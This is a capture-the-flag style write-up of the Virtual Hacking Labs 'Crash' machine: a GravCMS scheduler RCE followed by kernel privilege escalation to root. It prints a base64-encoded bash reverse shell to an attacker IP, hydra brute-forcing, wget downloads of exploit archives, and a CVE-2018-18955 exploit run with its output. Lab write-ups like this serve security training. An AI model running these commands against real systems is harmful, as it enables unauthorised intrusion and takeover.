xsspresso
xsspresso
WriteupsVHL — Crash
WebEasyLinux

VHL — Crash

GravCMS on Ubuntu. Unauthenticated scheduler RCE CVE allows arbitrary command execution as the web user, then sudo privesc.

February 12, 2025Virtual Hacking Labs
#GravCMS#Scheduler RCE#CVE#Sudo

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.63
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 19:32 EST
Nmap scan report for 10.11.1.63
Host is up (0.022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f:4a:9c:ee:63:f4:5c:ec:4e:aa:cb:aa:fd:7d:21:b2 (RSA)
|   256 9c:cc:be:88:3c:c5:96:9d:37:0a:02:9b:bc:60:81:f1 (ECDSA)
|_  256 64:48:b9:34:95:af:b9:7d:a9:83:c0:1c:71:08:d1:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Home | Grav
| http-robots.txt: 8 disallowed entries 
| /backup/ /bin/ /cache/ /grav/ /logs/ /system/ /vendor/ 
|_/user/
|_http-generator: GravCMS
|_http-server-header: Apache/2.4.29 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT      ADDRESS
1   21.55 ms 10.11.1.63

21

sh
21/tcp open  ftp     vsftpd 3.0.3
sh
ftp anonymous@10.11.1.63
Connected to 10.11.1.63.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
sh
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://10.11.1.63           
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-12 19:34:33
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://10.11.1.63:21/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-12 19:34:50

80

sh
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Home | Grav
| http-robots.txt: 8 disallowed entries 
| /backup/ /bin/ /cache/ /grav/ /logs/ /system/ /vendor/ 
|_/user/
|_http-generator: GravCMS
|_http-server-header: Apache/2.4.29 (Ubuntu)
sh
echo -ne "bash -i >& /dev/tcp/172.16.1.1/4444 0>&1" | base64 -w0
YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xLzQ0NDQgMD4mMQ==
  • modifiy the code in the highlited red area
sh
nc -lnvp 4444
sh
python3 gravcms.py
sh
nc -lnvp 4444
listening on [any] 4444 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.63] 58622
bash: cannot set terminal process group (1738): Inappropriate ioctl for device
bash: no job control in this shell
webuser@crash:/var/www/html$ whoami
whoami
webuser

priv esc

linpeas

sh
╔══════════╣ Operative system
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.15.0-29-generic (buildd@lgw01-amd64-057) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018
Distributor ID:	Ubuntu
Description:	Ubuntu 18.04.1 LTS
Release:	18.04
Codename:	bionic
 
╔══════════╣ Sudo version
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.21p2
sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/15 * * * * root logrotate /etc/logrotate.conf
* * * * * cd /var/www/html;/usr/bin/php7.4 bin/grav scheduler 1>> /dev/null 2>&1
sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/lxc
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/sudo
/usr/bin/wget
 
╔══════════╣ Installed Compilers
ii  g++                                   4:7.4.0-1ubuntu2.3                          amd64        GNU C++ compiler
ii  g++-7                                 7.5.0-3ubuntu1~18.04                        amd64        GNU C++ compiler
ii  gcc                                   4:7.4.0-1ubuntu2.3                          amd64        GNU C compiler
ii  gcc-7                                 7.5.0-3ubuntu1~18.04                        amd64        GNU C compiler
/usr/bin/gcc
sh
                      ╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 143K Nov 30  2017 /bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
sh
webuser@crash:~$ ntfs-3g --version
ntfs-3g --version
ntfs-3g 2017.3.23 integrated FUSE 28
  • https://www.exploit-db.com/exploits/41356
sh
mv /home/sake/Downloads/41356.zip ./
sh
webuser@crash:~$ wget http://172.16.1.1/41356.zip
sh
webuser@crash:~$ unzip 41356.zip -d ./
sh
webuser@crash:~/41356/ntfs-3g-modprobe-unsafe$ ls
ls
compile.sh  Makefile  rootmod.c  rootshell.c  sploit.c
 
webuser@crash:~/41356/ntfs-3g-modprobe-unsafe$ chmod +x compile.sh

linux exploit suggester

sh
webuser@crash:~$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
 
Available information:
 
Kernel version: 4.15.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 18.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
 
Searching among:
 
81 kernel space exploits
49 user space exploits
 
Possible Exploits:
 
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2018-18955] subuid_shell
 
   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
   Exposure: probable
   Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45886.zip
   Comments: CONFIG_USER_NS needs to be enabled
 
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-2586] nft_object UAF
 
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2019-18634] sudo pwfeedback
 
   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.
 
[+] [CVE-2019-15666] XFRM_UAF
 
   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
 
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
 
   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
 
[+] [CVE-2017-0358] ntfs-3g-modprobe
 
   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
   Exposure: less probable
   Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip
   Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.

CVE-2018-18955 subuid_shell

sh
mv /home/sake/Downloads/CVE-2018-18955-main.zip ./
sh
webuser@crash:~$ wget http://172.16.1.1/CVE-2018-18955-main.zip
sh
webuser@crash:~$ unzip CVE-2018-18955-main.zip -d ./
sh
webuser@crash:~/CVE-2018-18955-main$ ./exploit.dbus.sh
sh
webuser@crash:~/CVE-2018-18955-main$ chmod +x exploit.dbus.sh
chmod +x exploit.dbus.sh
webuser@crash:~/CVE-2018-18955-main$ ./exploit.dbus.sh
./exploit.dbus.sh
[*] Compiling...
[*] Creating /usr/share/dbus-1/system-services/org.subuid.Service.service...
[.] starting
[.] setting up namespace
[~] done, namespace sandbox set up
[.] mapping subordinate ids
[.] subuid: 231072
[.] subgid: 231072
[~] done, mapped subordinate ids
[.] executing subshell
[*] Creating /etc/dbus-1/system.d/org.subuid.Service.conf...
[.] starting
[.] setting up namespace
[~] done, namespace sandbox set up
[.] mapping subordinate ids
[.] subuid: 231072
[.] subgid: 231072
[~] done, mapped subordinate ids
[.] executing subshell
[*] Launching dbus service...
Error org.freedesktop.DBus.Error.NoReply: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.
[+] Success:
-rwsrwxr-x 1 root root 8392 Feb 13 03:09 /tmp/sh
[*] Cleaning up...
[*] Launching root shell: /tmp/sh
whoami
root
cat /root/key.txt
f0avo5t53k9nnfg566zj
date
Thu Feb 13 03:10:00 CET 2025
python3 -c 'import pty; pty.spawn("/bin/bash")'

Up next

MediumFeb 2025

VHL — Dolphin

Dolphin CMS with a WordPress instance on port 81. Admin credential brute-force leads to plugin RCE and privilege escalation.

Read writeup
MediumFeb 2025

VHL — Fed

Custom PHP forum on Fedora Linux with MariaDB. SQL injection bypasses authentication, leading to file write and shell upload.

Read writeup
MediumFeb 2025

VHL — Mantis

MantisBT bug tracker with Samba shares on Ubuntu. Enumeration of SMB reveals credentials reused for MantisBT admin access.

Read writeup